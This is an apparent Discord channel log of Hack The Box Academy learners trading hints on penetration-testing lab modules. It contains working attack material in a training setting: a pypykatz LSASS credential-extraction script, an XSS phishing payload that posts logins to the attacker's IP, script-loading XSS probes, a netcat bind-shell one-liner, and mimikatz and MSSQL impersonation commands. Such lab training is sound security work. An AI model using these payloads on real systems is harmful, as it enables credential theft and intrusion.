#modules

say less

Thanks @fathom pendant

Np, they were being cringe earlier and idk if he got manually muted or automuted because he said a banned word

Yeah, earlier was auto.. but they got a forced 24 hour break

Bet

Thank you!

Hello guys i need help,

Module - Password Attack
Section - Windows Local Password Attacks - attacking lsass

myproblem-> I compiled the lsass file using the Pypykatz tool, but I did not find any information about the vendor user.
https://academy.hackthebox.com/module/147/section/1359

Did you do try other methods? Also idr pypykatz being useful for a windows lab

wdym compiled the lsass file?

Also this ^ pypykatz extracts from a .dmp

What are other methods?

Didn't realize this section didn't go over using stuff like secretsdump or @next bronze super cool dump tool

how could they

secrets dump doesn't dump lsass tho

oh they only talked about pypykatz, weird

Yeah, which I'd think maybe they'd reference mimikatz or have it on the host

yes i tried secretsdump

if it's for lsass secretsdump can't get it

pypykatz should work, let me test it

Either way the .dmp file has what you need

Or it should

i will check again

thank you

If you want you can add | grep -i "vendor" -C 10

That should at least make it easier to see

(-C gives context lines around it)

-A is after, -B is before

its worked

thanks

unless you're in my head where it's above and below and always get it wrong >.<'

Just edit the grep binary to make it so

cool just found a bug in my tool

Time to throw it in the bin

https://tenor.com/view/ryan-gosling-its-over-over-blade-runner2049-blade-runner-gif-24854081

stuck on sqlmap essentials skill assessement, located the post req but can't bypass protections

i tried all things covered in module, im literally just spamming one tamper technique after another

Is this the right Channel to give feedback on a module?

#858470491676737536

thank you

Which ones did you try

I am still beating my head against the wall trying to figure out this domain enumeration module

Mind reading credits all used up

https://academy.hackthebox.com/module/144/section/1256

all of these for now

percentage is that giving me hope rn but idk

hi guys i need help, i found the flag but it shows me that it is incorrect
module: passowrd attacks -> section: pass the ticket from linux

also they taking forever to finish , and i dont even like what im doing rn, i mean i should be able to know whats happening to be able to choose tamper not just spam them

Well I can say you did use at one point the correct tamper

Hi guys! I have a problem with my parrot os in virtualbox, when i try to boot it i have a message of : to please switch to a supported graphic device to avoid problem, what can i do? is the first time it happens

Any particular question on it or the whole section?

The whole section really, I got the fqdn and somehow figured out that there are 2 zones, struggling to find the Txt record now

you probably got the wrong flag, what's the first 3 character? and which question

Should be pretty quick to complete, what other flags did you use?

just --tamper flag and --dump

maybe don't use --dump, it will take longer, have it list the available database, then you can make it dump a specific table in that db

Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. | flag: JuL

seems right, make sure there's no spaces before and after

I suggest you dig yourself a hole for most of that section and get comfortable

cool, I have been stuck in nslookup land and not getting far

Ooh nice one

Nslookup can also get you answers, but far and away dig is just a cleaner tool

Much nicer output

sorry for my grumpiness yesterday. Apparently I was having a day

It happens

I know that there are two zones but for the life of me I can only get nslookup to output that there is one

thanks @next bronze and @shut quest , my internet is slow af i just realised i was connected to my friends hotspot connection which made sqlmap to run so slow lol

got the database name and got flag !

Ty

You can use nslookup on a subdomain with axfr

| nslookup -type=any -query=AXFR inlanefreight.htb 10.129.18.203 |

You can look at subdomains with it too

I thought the pipes were supposed to mask it?

Double on both sides

|| ||like this|| ||

I've checked everything and it's still showing as incorrect :/

||I have the synatx right, I should just look at subdomains?||

Yes

cool

You should have a list of available things to look at

I do, yes

Try looking within

will do, Thank you

Ive probably missed something stupid but on the WinEsc module and the weak permissions section I have added myself to the administrator group by modifying a services binpath to add me to the 'local administrators group' but can't access the administrator user folder?

Sign out and sign back in

ahh okay thankyou

I’m lost in footprinting IPMI las question “what is the account’s cleartext password” I do not know what to do.

thanks, got the TXT record

Crack the hash

Don't use the mask (a3 ?1?1?1?1?1?1?1?1)
do use the mode

I try to use hashcat but think it does not work, it says “separator unmatched”

Then you copied it incorrectly

check the format of the hash. i like this resource myself https://hashcat.net/wiki/doku.php?id=example_hashes

probably need to use --username

That too

When use - - username it says “failed to parse hashes using the native hashcat format”

Don't put spaces

I did here not in the prompt

Don't add spaces here then :) it avoids confusion

Either way did you copy the hash exactly as shown in the msfconsole output?

(And are you using the 7300 mode)

Yes

whats your hashcat command

Hashcat -a 0 -m 7300 —username

..did you include the hash?

Yes

#modules message adapt it for your own use, you don't have to put -w 3

that hashcat command is missing some inputs

BRUH IS HTB WEBSTIE WORKING FOR ANYBODY

nope, it's down I guess

My machine crashed, so at least I know it's not just me

yep came here to check lol, my machine crashed, and now wont spawn

the team is aware. hang tight

We're looking into the issues

phew, i thought i was trippin

Ill update here when i can

dope

I am on the last question now finally. How many A Records are there for all zones. I know there are 2 zones, but every time I can only identify one zone

done, working again

You need to bruteforce this one with a listed tool, all wordlists aren't created equal

||bust it|| got it, hints on how to pick a wordlist, or am i using the one created in the documentation

last time i got yelled at by staff for mentioning the platform was down here, they said to reach out to support

Start with the given. Then look through a repo like seclists and start small

when it first happened g0blin mentioned it here and let us all know it was a known issue and being worked on, then the other night it happened again and i asked here and was told it wasn't the place to discuss it, but now we have staff here talking about it again. really confusing inconsistency with policy.

so now it seems again that it's OK to ask here if there are technical issues with the platform? is there a page we can visit to get the policy for the day?

surely it's not just up to how the staff member is feeling at the time, is it?

Generally this isnt the place to ask no, simply because the majority of the time its a personal issue and its just annoying to have people pester others when its their own connection, so you should contact support about such issues.

But like if a staff member wants to pop in to reassure people real quick thats okay for them to still do so.

is there anyone on here who did the Introduction to Python 3 module? I can't get it to take the answer for the Managing Libraries in Python (Continued) section, (question 2) and just wanted to see if I am putting the wrong thing in, it seems like an obvious answer to me.... Thanks!

Things should all be working fine now btw

General rule of thumb is technical issues goto platform

your welcome to ask here if you think the community knows

but for any support from HTB, it needs to go via the platform

right.. but if the platform is down you can't do that lol

there is an email technically lol(customerops@hackthebox.com)

but yeah if its down just dont spam it

mind if i dm? @cloud urchin

sure

can you dm the script or help me this is the last question i need for this module

if you have not done the module, no. read this #modules message

tbh i been at this for like a week im assuming my problem atm is converting to utc, im probably just confused by the smallest thing.

you can use

replace(tzinfo=pytz.UTC)

hey all, somebody can help me with the easy lab of Attacking Common Services? I already have the creds of the user f*****but i'm stuck. Can't seem to authenticate to the smtp server

Maybe it's a problem with my understanding of smtp

you should try authenticating to another service

1. check if ftp anon is allowed, the files inside might be used to u 🙂

would i need to put the . in between the username and time as it is shown in the php code or can i just do md5(user + time)

https://www.php.net/manual/en/language.operators.string.php

ohh thanks was trying to connect to the other service but it was so slow i don't have enough patience i guess haha

Thanks !

Is the target spawning for you guys?

yup

well it seems i was just impatient this whole time and expected it to be in the first few requests. got the flag!

I'm stuck again haha, so i connected succesfully to the other service, i uploaded a shell but can't seem to be able to execute it. I'm only able to download it. Any clues?

What service is that?

ftp

i cant connect with the credential i have via rdp

Read the files; one of them shows how to get a reverse shell

There is more than one way of doing it

hi guys having a problem with suricata rule development as i'm unable to rdp for the last hour, anyone has any idea how to figure this out ?

SSH

turns out it was because i did not type this at the end : /relax-order-checks +glyph-cache

sounds super legit

<@&861185840277487616>

aww man i really wanted to win the prize...

I wonder what the new academy modules are going to be about 🙂

I'd love to see more modules for the binexp path 😄 or maybe some cloud modules

❤️ academy

dir

can i dm anyone for some help at Question 8 in module AD Skill assessment II

Ask here I will try to help

need some clarification regarding chisel. does chisel starts a socks proxy automatically without needing to specify the proxy and also automatically creates a SSH connection meaning the ssh command is not needed to start ssh, chisel will start ssh ?
./chisel client -v 10.129.202.64:1234 socks.
2022/05/05 14:21:18 client: Connecting to ws://10.129.202.64:1234
2022/05/05 14:21:18 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2022/05/05 14:21:18 client: tun: Bound proxies
2022/05/05 14:21:19 client: Handshaking...
2022/05/05 14:21:19 client: Sending config
2022/05/05 14:21:19 client: Connected (Latency 120.170822ms)
2022/05/05 14:21:19 client: tun: SSH connected

i got nt system at at host SQL01 and i already transfer mimikatz, but when i run it, there is nothing happen and i cant even interact with anything so i gotta do everything all over again

checks

1. did you run mimikatz with administrator privileges?

i mean the GUI not even pop up ...

it just hang there

Are you trying to RDP into it? I dont remember if SQL01 has RDP access (I may be mistaken) , try with psexec or winrm ?

i got service user in mssql then from mssql i reverse to my box, then elevate to system so i cant winrm yet

Mimikatz shoud ideally work in the shell of SQL01

ikr, but i got shell with nt system and when i ran it, the shell keep hanging there ...

I cant think anything at the moment that will help you.

thanks, i guess the lab got some problem

Try restarting the lab

hello guys,
I prepared a bash script. This script saves each user information in the content of the lsass.dmp file to a different txt file.

#!/bin/bash

lsass_dump="$1"

if [ ! -f "$lsass_dump" ]; then
echo "Error: lsass.dmp file not found!"
exit 1
fi

mimikatz_output=$(pypykatz lsa minidump "$lsass_dump")

counter=1

while IFS= read -r line; do
if [[ $line == "== LogonSession ==" ]]; then
filename="LogonSession_$counter.txt"
counter=$((counter+1))
fi
echo "$line" >> "$filename"
done <<< "$mimikatz_output"

echo "LogonSession information successfully extracted and saved to files."

ogonSession_1.txt LogonSession_12.txt LogonSession_15...

hopefully it benefits your business

<@&861185840277487616>

@tired schooner i have a real job

you can also try to dump SAM

you may find something juicy there 😉

can I discuss something about AD enum module with someone. One thing got me confused.

sure

is there a certain reason you would want to use export when using whois dig and nslookup instead of just using the commands on the target domain I know export is for setting environment variable just confused why they do it like this in the module

yeah, i got it with dump sam

So instead of writing the whole target every time, you just call the variable

makes since thank you

Anyone having issues with the target ip not spawning

Nvm just was slow

Module: Attacking Common Services, Section: Attacking SQL Databases, Question: Why i cannot crack the ntlm hash intercepted by impacket-server, using either password given at Resources or rockyou.txt, might need a nudge

ntlm hash intercepted: ```
mssqlsvc::WIN-02:aaaaaaaaaaaaaaaa:lm:nt

the password may be too strong, you can always pass the hash

mmm ok ill try it now

I am doing the Using CrackMapExec module and I am having a bit of a trouble in the Gathering Information with an Account -> MSSQL Enumeration and Attacks section. I have found the user for the first question, but when I try to query the database core_app it seems that it is empty (I have confirmed that it exists though):

||```bash
$ nxc mssql 10.129.204.177 -u 'engels' -p 'Inlanefreight1998!' -q 'SELECT table_name FROM core_app.INFORMATION_SCHEMA.tables'
MSSQL 10.129.204.177 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL 10.129.204.177 1433 DC01 [+] inlanefreight.htb\engels:Inlanefreight1998!

I thought it might be an access issue, since this user it is not a DBA, but privesc does not work either:

||```bash
$ nxc mssql 10.129.5.141 -u 'engels' -p 'Inlanefreight1998!' -M mssql_priv -o ACTION=privesc
MSSQL       10.129.5.141    1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL       10.129.5.141    1433   DC01             [+] inlanefreight.htb\engels:Inlanefreight1998!
MSSQL_PR...                                         [*] INLANEFREIGHT\engels can impersonate: julio
MSSQL_PR...                                         [*] julio can impersonate: INLANEFREIGHT\robert
MSSQL_PR...                                         [-] can't find any path to privesc
```||

Any nudge would be highly appreciated!

Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'mssqlsvc'.```

i have error passing the hash, what was the syntax of the command :0

hey any hint for it?

whose creds do you have

||'engels' -p 'Inlanefreight1998!||

i am trying to answer this question: What is the password for the "mssqlsvc" user?

is that the only set of creds you have

I have 3 users, tried all of them, but since this user was the answer to the previous question, and there is a privesc path, I thought that would be relevant.

I'm looking over what I did in that module, so I'll need an answer to my question.. again. what users do you have creds for

||engels, grace,diana||

at the very start of the mssql privesc section, there's a paragraph with the last sentence saying "In the following example, the user INLANEFREIGHT\robert has the privilege to impersonate julio who is a sysadmin user." .... have you tried those credentials?

okay let me google how to use hashes with that program for you

or perhaps what tools did u use, i could google it tgt as well

nm i see you need the pass, surely it's crackable then

can you dm it to me

sure

$ nxc mssql 10.129.5.141 -u robert -p Inlanefreight01! -M mssql_priv -o ACTION=privesc
MSSQL       10.129.5.141    1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL       10.129.5.141    1433   DC01             [+] inlanefreight.htb\robert:Inlanefreight01!
MSSQL_PR...                                         [*] INLANEFREIGHT\robert can impersonate: julio
MSSQL_PR...                                         [*] julio can impersonate: INLANEFREIGHT\robert
MSSQL_PR...                                         [-] can't find any path to privesc

The thing is julio is not shown as a sysadmin, so it can't really privesc to its account. I have tried all combinations of authentication methods as well: --local-auth, -d ., and -d inlanefreight.htb, but none worked.

That msg was for the other guy

if I remember right there's 1 or 2 things that doesn't work in nxc, try with cme for this specific module

that's interestin, good to know

Did that as well, but gave the exactly same results. I suspect the only issue is the julio is not a sysadmin and it is supposed to be.

i am doing footprinting lab-hard. i already got 'tom' and the password .Then igot a openssh private key by imaps.But the key doesn't work anyone can help?

it says : error in libcrypto

have you completed the first question?

I just tested the answer I gave, which is in the module, on both CME and NXE, and they both work.

Is your key formatted correctly?

Reboot the machine, works for me with nxe and cme.

i copied it from a email

Key works. Its most likely a problem with either a formatting like an enter at the end etc

Or for w/e reason it's copied with CRLF

The whole file? Or its contents?

I've seen it happen a few times

Where the only way to see it is either with file id_rsa or vim -b id_rsa

yes

Where instead of the $ at the end you see ^W

use this "1 FETCH 1 body[]" and copied the content

Only copy from ----Begin to the end

Yes i did thr same. Worked but if maybe you accidently copied one character too much either at beginning or end or smthing its gonna throw problems

The ----BEGIN and ----END lines are important

i did copy from "--BEGIN OPENSSH PRIVATE KEY-----
" to "-----END OPENSSH PRIVATE KEY-----"

The BEGIN does need all the -

five -

im in the phishing part in xss, i used the payload ||'><D3V%0aONmOuSEoVeR%0a=%0aconfirm()><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.198<input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script> <! --||

I sent you a DM!

but im only getting a password prompt in the website

not the username

nvm i missed a < in my payload

i really don't know where my problem is

What's your command to ssh?

ssh -i id_rsa tom@ip

Just incase, is id_rsa 600?

done that

chmod 600 id_rsa

i also tried other users

tom is correct

Can you just in case try it on pwn box?

It is like a VPN issue. I tried doing it from a HTB Parrot instance and there user julio shows as sysadmin. But when I connect from my PC, no matter how many times I restart the target julio is a standard user!

hmm that is weird, I used my vm throughout the module

does dm mean talk in private ?

am new here

check if you have spaces left after END OPENSSH PRIVATE KEY-----

no

Yes

DM -> direct message

try to chmod 777 id_rsa

That would leave the permissions too open

or just make it executable ,

And then ssh would yell for a different reason

i think i once did chmod +x to make id_rsa for it to work but i could be wrong

i don't think it throws errors

If you have an rsa key that's 777 ssh won't allow the connection

And explicitly tell you that it's a permissions problem

i see, my bad, but i guess +x wouldn't make a difference ?

It generally wouldn't

As there's no reason an rsa file needs to be executed

It's only read

makes sense

Did you try swapping positions of your arguments, ssh tom@ip -i id_rsa

didn't work

Weird

chmod 600

He already did

I dont have the file on me to md5sum it

I have the full ssh key copied in my notes

paste the whole file

many people misses parts

I have a question about "PIVOTING, TUNNELING, AND PORT FORWARDING " ' submodule "RDP and SOCKS Tunneling with SocksOverRDP".
Whenever i try to load the SocksOverRDP DLL using regsvr32 on the footold htb-student, it gets blocked. I made sure the AV is turned off to no avail. Is there a probem with the machine or am i doing something wrong ?

If you can copy to a file and md5sum for them, that'd be helpful

They state they have all the required lines

Real-time protection

yea give me a minute or two since im in a diff country and have to use a shitty laptop with pwn box

Just because defender is off doesn't mean there isn't any protection

Ah

@solid moth if you do an md5sum does it match this?

let me go boot up the lab hard and see if i can login with that ssh key

so we know if mine is correctly or a character slid into it

My other suggestion is pasting into another text editor

no

Sometimes it's dumb

it doesn't match

@fringe urchin does yours have an extra line?

ok give me a second im booting up lab hard machine and see if i can login so we know if mine is correct

Just to make sure all conditions are similar

i got in !!!!

mine works

i used vim

vim works !

👍

you used nano before?

is there anything else then vim ;p

VI

Using a second text editor tends to fix issues

this is very helpful!

Had a weird issue one time where a character got transposed

hello im in session hijacking, i don't understand the part where the server execute our script.js in our vm locally

to identify where the xss is hapenning

the "script.js" , is any jS SCRIPT we should write?

i can't seem to understand this to identify the injectable field

can you send me the link to the module? Need to check if i did it

alright here it is :https://academy.hackthebox.com/module/103/section/1008

Is it the "detection" part you don't understand ? "So, we can use this to execute a remote JavaScript file that is served on our VM. We can change the requested script name from script.js to the name of the field we are injecting i"

I need help about these tasks ** Skills Assessment - Using Web Proxies** (the 3rd question). https://academy.hackthebox.com/module/110/section/1055
Don't read/look at images if you don't want to get spoil ! ⚠️

|| I found the cookie decoded and now I replaced it in the request to have something like it (1st img), then I started an intruder Attack with Burp Suite to find the correct cookie and have a full md5 hash. Why everything is "good" in the requests then ? I missed something 🤔 ? ||

yes but

what is the content of that js file that is server on our vm

since initially i dont have any js file on my vm

Well you need to create that file

From what it sounds like

So in the detection process, we don't need to provide any script.js file initialy, since we only want to know which field is vulnerable! I'll elaborate in my next message^^

During the detection process, we only want to know what field is vulnerable to XSS. Assume you have 3 field we want to test for XSS: name, username and website
So in order to detect if any of the fields are vulnerable, we send an XSS payload containing that fieldname so when the target executes the XSS, we will know which field was vulnerable.
For example we will use the following three payloads: <script src="http://OUR_IP/username"></script>, <script src="http://OUR_IP/name"></script>, <script src="http://OUR_IP/website"></script>
Once the target executes the payload, we will receive a GET request on our website to either /username, /name or /website

Then we know which field is vulnerable and we can move to the next step to steal the session cookie
Hope that explains it! If you have any more questions, feel free to ask 🙂

oh i think i understand, im dumb , so if the "X field" is xss vulnerable we would get the GET request back to our vm , its won't find any file tho

so in detection , creating a file isn't necessary

yes exactly!

but in the section, they went through different payloads after detecting the vulnerable field using <script>...</script> right?

that payload didn't work and instead i was detecting & choosing the payload at the same time

is that how its works?

yeah it's a bit confusing since it sounds exactly as you mentioned. But in fact you need to try all the six different payloads in the detection process to find the vulnerable field

thanks man , now i understand very well how it works

on Attacking Active Directory & NTDS.dit, i tried to bruteforce jmarston password using the password list given by htb but i got nothing, should i try rockyou.txt

AFAIK you don't bruteforce, you crack

Bruteforce is a different technique

but when i try to use rockyou in crackmapexec

i cant crack because no hash is provided

Should be in the ntds.dit iirc

Oh wait that's the next Q

There's a wordlist suggested by the module section

ya but it doesnt work

The fasttrack.txt?

nope the password.list

ive read through the discord message and i found out it was in rockyou but i cant seem to insert rockyou in crackmapexec it got this error

Either way I wouldn't bruteforce with rockyou

true the process is long VERY LONG

ahahahaah

Use the wordlist showcased in the section

Or the mutated wordlist

Hey, if I have questions about an exercice for a specific module where do I go ?

this is the place

Okok

It is Get section in Web request module, the fondamental. I don't understand what I'm supposed to do with devtools and curl, the module shows what to do except that the exercise consists of repairing the site

I don't have information like "search=le", I'm clearly lost

Hey anyone know from the attacking common services/attacking smb how to download the id-rsa file to login via ssh after we have got the password ?

use get

if you already in the smb session and want to trasnfer id_rsa file to your vm use get id_rsa

also you can use help in smb to display commands available to you

for Linux priv esc, Shared Object Hijacking im so lost. Where is the payroll binary? I found the libshared.so in the developement directory but cant seem to find payroll anywhere

Embarrassingly enough, I seem to be stuck in the Public Exploits Section of the Getting Started module inside the Pentester path. After scanning the server with various methods, I have discovered that the only consistently open port is 22, running openssh ver. 8.4p1, and the OS is Linux Debian Bullseye or Sid. There are various other ephemeral ports running nginx 1.19.2 and Appache 2.4.41 (Ubuntu). On one of the servers (I have restarted the target server several times) I found one port running Firefly music app, but that was several servers ago. I have searched on Google , exploitdb, and metasploit, and can not find any useable exploits. The hint says to look for plugin exploits, but I don't see any services that are plugins or that use plugins. Any hints would be appreciated.

Maybe visiting the website should give you additional info that you need

Thanks, Schainy.

I hope that it helped you! If not let me know! Im aswell speaking out of my head, if its something specific i would need to get my notes

Will do. Waiting for an open Pawnbox instance at the moment. Must be a busy day at HTB

If you have the chance make your own vm machine!

Good point. BTW, your hint did the trick. Got the file, now I just have to find where msf put it. The indicated path doesn't seem to exist. But that is another problem

Can I DM someone for
ABUSING HTTP MISCONFIGURATIONS
Skills Assessment - Hard ?!

And once again, thank you. Moving on finally!

Im pretty sure the exploit tells you the path

If you still have problems i can take a look if you provide screemshots

Nope. I was just being stupid. I had no trouble navigating to the (hidden) file. I should never type before thinking things through.

Guys only i don’t have retired machines?

I mean there is only 10 machines and they are hard and insane lvl only

Or that cause of maintenance?

Stuck on Attacking SQL Databases, no idea whatsoever. logged in into mssql server using given htb credentials. looked into db found no weird table. stuck there, any hints to follow

"found no weird table"? there isn't gonna be a "weird" table

also: did you escalate to the mssqlsvc ?

if not: then first find a way to do that - theft is definitely an option

(yes that's a hint to the next step method)

lemme try, thanks

hi, can anyone help me with SeDebugPrivilege from windows privilege?

In Exploiting internal Web Applications I in the Advanced XSS and CSRF Exploitation module I have found the secrete table but listing it's contents returns a 500 error. The same "select all" query on the other table works perfectly fine... Anyone can help with this?

i am at the skill assesment 1 module attacking common seervices, should'nt i be able to find the user with smtp-user-enum and the provided list in the ressources?

anyone have any advice on how to answer questions in learning modules where i don't even know where to start? there have been so many questions that require information that wasn't even covered in the module and i can't figure out how to solve them besides looking up the answer to the question, which i don't really want to do. i want to figure it out myself.

google specific things, look at documentations

what kind of question are you talkling about

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
right now i don't even know where to start other than curl https://www.inlanefreight.com

curl doesn't even work in the pwnbox for some reason

so i have to use a terminal

is this part of the Linux Fundamentals module

yeah

pwnbox doesn't have internet access if you're on the free plan

i'm on a student plan

curl should work

ok so curl works but it gives me different results than when i use the same command in my terminal

Yes you should.

okei...but i have 0 results... strange...

i found it yesterday...but did not finish the modul...

What’s your command?

or the skill assesement

smtp-user-enum -M RCPT -U /opt/useful/SecLists/Usernames/xato-net-10-million-usernames.txt -D inlanefreight.htb -t 10.129.91.250

smtp-user-enum -M RCPT -U usernames.txt -D inlanefreight.htb -t 10.129.91.250

or with the list in the ressources

I think you’re supposed to use the User.list provided by htb.

yes usernames.txt is that list

i think i can remember the name...but why do i not find it anymore

spawned a new target and now within seconds i have the result...

anyone?

Retrieve the contents of the SAM database on the DEV01 host

In network attack. No way to connect back to the DMZ host. nc and sbd are not connecting, msfvenom payload is connecting but no shell.

There is no firewall. I don't get what can block a reverse shell

Am I tripping or did the migrate cheatsheets from .md to PDF?

why do you need to connect back to the DMZ? why not just set a pivot

yes

sadge

that's been a relatively recent/mixed thing

How to I rebel?

write a strongly worded email

@slender shoal Hey are you a mod can u fix this?

"I hope this email finds you before I do"

mods aren't staff

nah it's cealry @slender shoal's fault

Actually it's unfortunate lol

I had so many cheatsheets

mods/admins are only on the discord side; (if they don't have the staff role)

hello, any luck with VAD analysis, i am doing the same module,

@fathom pendant ssh to dmz to set up nc -nlvp should be simply working

don't ask to ask, describe what you need help with

are you trying to get a revshell from DEV01 back to the DMZ host?

or from DEV01 back to your machine

if back to your machine: you need port-forwarding

as the DEV01 is likely on a separate subnet from the jump host

from DEV01 back to the DMZ

well are you using the right IP

i.e. the IP that matches the subnet

yes

172.16.x.x

yes

I am going to reset, somethings are working better sometimes

how are you port forwarding? if want to connect a rev shell, you'll need a reverse tunnel

You can email them, but I cant change it.

lies

I don't need a tunnel if I receive the shell from my DMZ ssh session

There is maybe a conflict with sshuttle

perhaps

No

Seeing a lot of let me restart machine. It could work. Is cpts the same? Can it brake?

sometimes; but specifics re the exam can't be discussed

same troubleshooting steps apply, restart - if you still believe the issue to be with the lab and not your skill -- contact support

personally? I've only seen one or two times where restarting fixed something, the rest is all skill issue (talking about modules in general)

Yea i understand! Was just windering if it can happen and if cpts exam can easily be restarted like normal machines

ye

afaik there's a reset button

yeah you can reset the exam lab

ok ty

good morning, I am stuck again. https://academy.hackthebox.com/module/144/section/1257 I enumerated the target and found about 12 vhosts or so, I am not sure what to do next to find the flag

you need to use the tools and techniques shown by the module to find the valid vHosts that aren't just the default page

any vHost will be a hit

it's about determining which are false-positives

yeah, i used ffuf to find about 12 or 16 vhosts

well then your ffuf is set up incorrectly

you need to filter out the default response size

how do you determine the default response size?

by using the techniques shown in the section

I don't think it covered how to set that

yes it did

the simple loop shown in the section showed how the example got the filter size of 612

it said the flag -fs is the filter parameter

simple loop?

Content-Length = Response size

the cat <file> | while read vhost; do ...;done loop

lookinf

where it refers to finding a hit for dev-admin

attacking common services, skill assesment 1, i found the user, but now no pw. any hint what to do?

well; there's other available services to attack

why not use that username to attack a service, perhaps related to the user you found

tried a few, but will try again

if it's a certain username try attacking with and without the @domain

my only hint to you for what service to try is re-read your notes regarding services - some are more tied to each other than others

and pw reuse is very common

Could someone explain why SELECT * FROM logins WHERE username='notAdmin' OR '1' ='1' AND password = 'test'; would not work? HTB says this would be invalid because the username does not exist, but wouldnt the OR condition evaluate to true even regardless from the 1=1?

you're likely misunderstanding what's being said; but also - the reason it doesn't work is the "AND" operation

if there isn't a 'test' password it'll still fail

A OR B AND C

[A OR B] AND C is how it can be read

the and statement is what might invalidate it

Marcie, when I ran the script you alluded to, the responses all came back with content length 10918, when i ran ffuf with that flag to eliminate that response I was left with no output. I am missing something in this section, but not sure what

using the right wordlist

ah

don't use the small ./vhosts list they give you

use the SecLists wordlist they refer to in the reading

ok let me try again

I'm not sure I understand what you are saying. ||cat /home/simon/SecLists/Discovery/DNS/namelist.txt | while read vhost; do echo "\n********\nFUZZING: ${vhost}\n********"; curl -s -I http://10.129.37.42 -H "Host: ${vhost}www.inlanefreight.htb" | grep "Content-Length: "; done|| still coming back 10918

use the seclist with ffuf

also

your command is wrong

your command would append something like us1www.inlanefreight.htb

I thought for ffuf you needed to have identified the vhost first?

no

you're using ffuf to identify valid vhosts

that actually contain the info we want; everything else redirects to default page

you want to put the VHOST before the .inlanefreight.htb

the provided vhost they use as an example to baseline with

you want it to give you ${VHOST}.inlanefreight.htb (but using curl is EXTREMELY slow)

ok, thank you. let me mess around with this information now

ffuf will be faster; and using the right format you will get it

In "Windows Privilege Escalation Skills Assessment - Part I", im wondering how you download the printspoofer.exe to the target, I tried doing the python http.server to /users/public, /windows/temp, /windows/tasks, /windows/system32/temp and I got nothing

well it could be that python isn't installed on a windows machine

unless you mean download from your system to the target

also you might need to specify C:\<filepath>

I just typed out a whole message asking for help and got a warning about sending the same message over and over??? And I lost the whole message I typed out 😦

because it contains a bunch of lines of code

which the automod interprets as spam

in order to not have that happen: follow and read #welcome

idk if I have an account at app.hackthebox

I just need help with a module.

it's free and takes a few minutes to set up

Anyone have a second to help with Shells and Payload - Bind Shell?

then use less words to ask your question or break it up

only if you actually ask your specific question

Well I've been stuck for like 12 hours so I wanted to be thorough.

https://dontasktoask.com

No good deed, right? This is kinda of obnoxious.

well there's being thorough and then there's adding way more info than you need

i.e. i've tried xyz methods instead of being hyper specific with commands

Finally finished the AD module! Phew. That was a tough one.

I was thorough. idk, that isn't a helpful response.

most people that have done the modules will be able to pick up what you want/are struggling with

reminds me i need to finish that

well we didn't see your message

I know. And I lost it. Due to stupid discord nonsense.

Logged into the SSH account and ran the syntax the module gave ||rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <ip> <port> > /tmp/f|| and then attempted to run ||nc -nv <ip> <port>|| as the module suggest, but it wouldn't work... got connection refused, do I actually have to run the bind syntax on my machine and not the target?

so again what i'm menaing is use less words to convey what you're struggling with

instead of focusing on discord/automod deleting it

It took me for.ev.er... but it is done now.

depending on the port you are trying to open, it may require sudo, try ports > 1024

i used sudo, should've prefaced with that

That is the right way to do it though right?

Intro to Assembly Language Skills Assessment The above server simulates a vulnerable server that we can run our shellcodes on. Optimize 'flag.s' for shellcoding and get it under 50 bytes, then send the shellcode to get the flag. (Feel free to find/create a custom shellcode)

completely stuck. dont want to say what I've tried already in fear of this post being automoderated and deletedlike last time.

sec if you use the pipeline twice before putting text in and then twice when you're done it hides it so it isn't a spoiler

Whoops, wrong questionb: Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.

the way it instructs is to use the ip of the target machine

in the ip -l part

aka telling it to listen on that interface

is that what you did? or did you use your machine's tun0 ip

I thought so, maybe it's just user error, I'll try again, would it be too much to ask for an explanation of what the bind shell syntax is actually doing? I try to understand everything so it makes sense instead of just typing it, and no I used target ip

i mean

and just to double check you run the bind shell syntax on the target machine right?

yes

if it is I completely understand that

just figured it was worth asking

bind shells are like reverse shells, but the other way around

instead of you opening a port on your system and having the target call back, you open a port on the target and have your system call in

Intro to Assembly Language Skills Assessment

Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.

Completely stuck for over 10 hours. Have tried everything I can find in the whole module. Not even sure what the format for the answer should be. Is this a flag?

got shellcode for loaded_shellcode, assembled it, gdb'd through it. not sure what I'm looking for. Keep getting seg faults. Have tried several things mentioned throughout module to make it all fit, but I am getting nowhere. Just confused, going in circles.

#modules message

wait you mean this question has been asked and answered? :O

most people don't use the discord search feature

@next bronze Hey mate, mind if I DM you for a minute?

or even know it exists

Ngl they made it far worse with the new updates

Ya'll are kinda jerks? Not familiar with discord. Sorry for coming to the community for help looking for help.

Same shit last time I came here for help, too. Not a welcoming community.

Very frustrating.

i'm not really being a jerk, just stating how it happens often

😮

and Xreous actually linked to an answer

I know. That was nice of them. That was helpful.

i just didn't wanna use the discord search feature for you

if you tap the channel name it the top it should give you a menu where you can find the search if on mobile

otherwise top-right of the app is a search bar

imo the mobile one is just stupid

CTRL+F preloads the channel in search.

Or, you could own that it wasn't a welcoming way to follow up a legitimate response. This server is 0/2 with me coming here earne3stly looking for help and people just being kinda dickish for no reason. When I'm just here looking for a little help. No need.

mobile doesn't let you specify channel

In: ?

if i wanted to be a dick i could have been, I explained why your message got deleted and that it might not if you truncate your message

doesn't work on mobile

i even offered a way for you to ensure it doesn't get yeeted

I literally wrote that message to help people with that question, not sure how that's not helpful

Works for me

